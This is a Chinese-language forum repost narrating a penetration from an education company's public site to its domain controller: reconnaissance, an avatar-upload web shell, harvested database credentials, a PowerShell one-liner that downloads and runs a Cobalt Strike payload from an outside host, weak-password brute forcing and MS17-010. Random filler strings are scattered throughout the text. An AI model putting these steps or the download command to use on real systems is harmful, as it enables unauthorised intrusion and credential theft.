中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

: d5 t& v1 u2 j! A$ d6 `* W' F; K 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 $ Y. H) r# c: m. c8 y3 g

# \% m* z6 `! n- i, ]' Q

2 F& J" w, D Z7 P$ `" ?* G  0 O1 H' Z% g+ Z( `3 Q* ^2 L {$ Z

" x. O% y" c, h1 E9 E* T0 M# l, |6 E& w

# C4 @# P% k" z/ w% T: ?- }3 h 正文 . \- ]2 V: l; C6 p$ Z5 K; E! e( A& \

4 _* P: @3 K' ]) x: y2 [/ x

9 g$ f8 S* q+ @5 [ d5 L2 V0 W   3 L5 m* x& @5 J3 R3 i8 D4 q

/ [. N$ u9 T. F

2 }( \4 i* \3 Z3 t# f& g 目标:www.xxxx.com(一家教育机构)
8 X) y( {3 K$ R; K- B2 Q9 T5 Q' M 打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能: A& {+ l( y5 s* F

8 I/ B) o$ X7 N' r

, Z; g l8 m/ J1 p! }8 I$ ` vshapes= # o' I7 e4 \$ T) S9 H

; Q& B8 }/ _! X l9 B& R; L

7 |4 ?6 s, o8 q) A& [2 B6 c 进行了简单的信息搜集
$ l0 j1 S& v8 n9 [* a
3 w0 x/ R" ?9 D9 ~ }3 h4 J" F; T n" h* c8 ]

4 e4 |4 [2 i) _* I' S

2 \" {( j S( {, y 子域名搜集4 Z( N; e% ~& Y

, B% H0 d1 g6 F+ p! q$ z$ Y

9 C! @8 ~; l7 U$ U" t vshapes=+ |: Y$ M- {3 T0 M; l. M+ @

4 P2 g( q5 m% J! x& n" Q! {4 x6 ]

; J" [( Q; Y# i) u fofa找资产
) t3 X% V' p# a! O
7 p* p+ Y: e0 J2 v( s; N& O3 {+ m * E- y9 c8 E( h1 V8 P) c' D

; `4 W: h* [( h- h( {8 W, ?/ x+ \

+ L9 s0 I! ? k vshapes= 7 q* S9 t# `# I) x% Q% ]1 d0 d4 r

$ Z+ g) Y# i# f" g; W

1 G7 s+ d, e2 g2 U2 \# }) a 一共七个资产。去重之后只有两个。
% g0 g6 Z* L: j7 }0 k, Y( f% ^
4 A9 h! h% X# @3 Q 6 O' N1 y* J( m: J

/ ?; B. O0 n5 F9 `8 E

# H! R+ g) y" K 目录探测 o9 }* P e& N) o# _, l, j

, P$ d- |. k- u, F6 E1 e0 }0 {6 c

" F% X2 D _: k2 i# A1 Y( J vshapes=+ M7 P6 H) Y, e! r1 i

. p. `/ h7 ^; W( g! |3 X

* m( J; o# m- p4 H* U2 ? 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
3 a) v/ ?, H! Y% b# m
6 N5 |6 C/ @) ~$ E9 v* f( P- F. j 4 `4 w5 J0 O# H- d

+ R- P& T( [- n! R; J, _! ?

6 [) L: i8 |6 B! g* q$ R 我又尝试了通过修改返回包来绕过登录界面1 T+ ~( _5 U+ q+ ]: `3 }2 h' ^

/ \% G* X7 G! u# K

, {7 x' W5 U8 ~2 [ vshapes=# W( @( D, m* c. \0 o5 j

3 o8 B/ P/ ^7 _" z

1 o4 E' G- q0 Q: v# o/ q6 @% u 还是不行,尝试注入无果 % r0 J# D. f% v5 j) g8 u1 ]2 `

I* X! J# H+ m0 ~7 X, h

$ o4 r& x* j% f3 C K4 N7 q* Y. U vshapes=7 w6 x: E3 N, Y: W

9 s# @( F5 M; X) Y$ m" q& }. b4 [

$ r8 f6 U: T; u+ A 不过我目录探测出了一处Spring信息泄露
8 R6 ?0 z2 g; k' g" Q4 {
# @. J. Q0 j$ H. l: \$ m8 F* ~2 a" Y% M+ s1 l

D1 o8 p a6 S

' x" I2 K% a9 M# u6 r% x' [ vshapes= 7 H' G% B! B9 i# Q0 L: M7 C

/ P6 Z3 _8 c4 Y \' y3 r1 b+ V

4 l4 Q. Z7 `+ \" R1 m/ q 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 , @- G% s( v2 ?( {# o9 t( i

9 r7 ]( [) R: g% q5 d

* m' a N+ g$ G4 \ vshapes= - P! g# H& W- c% F7 a! _

" B0 z( Y. h: c# ~1 D$ q. t. K

4 P1 }/ {# X" S: e 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。/ k5 S1 x4 ?& {

' [4 `: ^. F- x& ^: ^! T& ]

i6 x: [* W$ A# G vshapes=+ x: T! n0 v a9 }9 A( H" X! S

+ u u8 w; M5 P6 b6 |9 }2 s) x

1 F6 E3 J% D! v 获取有些师傅到这一步就手机抓包电脑测了。 + d( }5 z. w4 _8 o1 E8 X h$ S

8 X$ j( @0 I: W) T

# M3 K4 k" L7 a0 }* N7 ^$ o Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。# O# A a1 o( }2 j8 h

/ J0 W( i2 k2 C) B( w. Z' c

0 @3 d2 C6 z1 d. Q" D8 r( Z! k' [' V6 e$ N 其中在一个公众号发现了小程序,可以进行注册。1 V5 |) M; {8 o8 w0 I! U( M6 R/ t. w

1 @2 e! i* [# B M

% `/ _& Q' r2 q1 m4 X9 N# s% S) C 看到了头像上传,尝试上传获取WebShell , w8 m" C2 Y/ T: Q2 j5 r6 D! W

- ^: o% \7 R( Q0 w

9 R9 m6 {( w# \5 \5 a$ h- v vshapes=% n" O2 z1 T+ }3 x. _ x- P( ?7 h

( P6 M2 F/ q4 L

7 o+ t- b9 K9 ^% U 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问$ K4 ~- B2 ]7 N2 y; ^0 D

; |! o: y" O1 ^ d

$ o2 w2 P1 P, }4 U# j: W vshapes=! k) @' ~# g. N- t5 x

, I9 u# J" N8 y. W$ L

$ D Z8 [6 F& ~$ b 然后上了大马$ b9 }& p3 l( L

& N* q+ k/ K; i1 a3 n+ w

5 h0 @3 Y1 m+ J4 Z. \* ?# z& R, \ vshapes=( q8 U/ i( a8 D0 X( Y

4 D. v+ I" R+ _8 \' o! V

" K! i9 A6 O2 m/ k4 w) w3 K vshapes= " w! G& m$ O7 a+ w7 u% s) q; }

, [# |& Z/ g$ q2 x

1 w: g2 E. O% U& G6 M6 U 通过翻找文件发现数据库账号密码8 i! u. m& b$ |" A, t

4 P* H, P- x9 S3 S6 _- H% E, w

& R3 D2 p/ p1 a9 N6 j. u" ~ vshapes= ' T; O+ a- ?4 S; r1 g+ }

$ A- v& c$ p3 ?, k. ]+ c7 L! X

3 ]5 Q- ^2 H2 p* F, w- | --内网渗透 * F+ A& {" [* H8 V8 p( o1 S: K) J. g

& N6 c- B1 R8 I( n* Y j, [

( h3 _7 u- ]# V' V 直接通过powershell执行 cs上线" M: R, i! r. U6 {9 D$ S0 i& E f

8 X2 e% H; T' c5 k) J: n; ?% H. w

O( Y2 i" W* m% n: ?6 J powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" ; X) O' W. {. d1 d) E+ E1 U/ U

4 z. n% a* O/ E W- e! z

3 ~& i, X: s4 ]; ]* @. w' d vshapes= M) P: L! x. d, N( ?2 s3 g

+ n ^2 @7 [2 Y6 J+ `6 t: z

" _0 i+ z' Y% q4 n1 A) J 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破* A8 V5 A5 D' t |8 G& x3 a

8 {" m: c x6 K: S! T

3 v9 z3 v* P2 c4 D7 g( D3 { vshapes=' D# u! L; j/ _* G

9 j2 g: r. U! V- }+ \

, V- N- _9 z# y! s: b 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, v, [5 \; H- A0 Z
) J$ q9 A( i6 W) \5 b0 q
: H; v9 B' J7 @, S. W$ v8 `9 r9 Z* s

# Q* N. m L/ D2 z2 [+ Z

1 h8 j }# p! n0 L# ]# W3 q vshapes=# t3 @9 w0 X- J! p& s; U

+ _8 U# D, O4 ]0 d3 C5 B

% p( \* G1 U: b0 C( V; J X 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
9 i: L( a" R/ K* t, p9 p
, w: L u& \- A! W3 L1 o( z8 Z4 J9 S& q E" l: j

7 f6 j/ C) `. W w" A& T

5 n+ S% [ C* `% @6 @7 F% q vshapes= ; }9 C2 K8 z( ]* C- w2 k

+ j# M9 P& d" ^6 H

3 v" `7 w8 L6 M' `
7 {' A5 B/ i3 f, R$ _% T
/ U3 b/ j4 b0 C# S 5 I) x8 Z- V/ u$ B1 ?6 J

" {0 D) q- f, [8 R( g

$ R) ]" m' }& }; c" v0 S  9 l$ R# h7 ], w

9 q4 U1 |1 s; a# p, ^0 z4 _% D

& k. j/ }7 T# ^ 小结 ) v+ d1 ]8 ~5 m% Z' L3 O

* Y K8 _8 q# a) u2 j1 n

5 P* s1 G5 S8 \) k* k0 E( y1 p  9 h/ A/ d7 F& R) U# p; G9 O

$ `( T, Z, f! h% ?

8 m& h3 ^1 k, P& l 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! $ X: k- @2 `8 E. ?

( L# M- H, L7 ~

" P) ^9 {/ D! G  9 m6 N1 c/ g+ F! {4 e/ E7 X5 C

4 R' R% b& P% s) D1 c5 e. P4 U* ` 8 U" t U) r0 Y H3 B0 w% A

) p+ K; C9 J$ o$ V 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ ]8 }* `: k7 S

% s' @: r$ o- `! \, e- x' h

" M# v( t3 O3 |1 n) F: r5 Q  1 E4 ? S% y6 @1 P





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2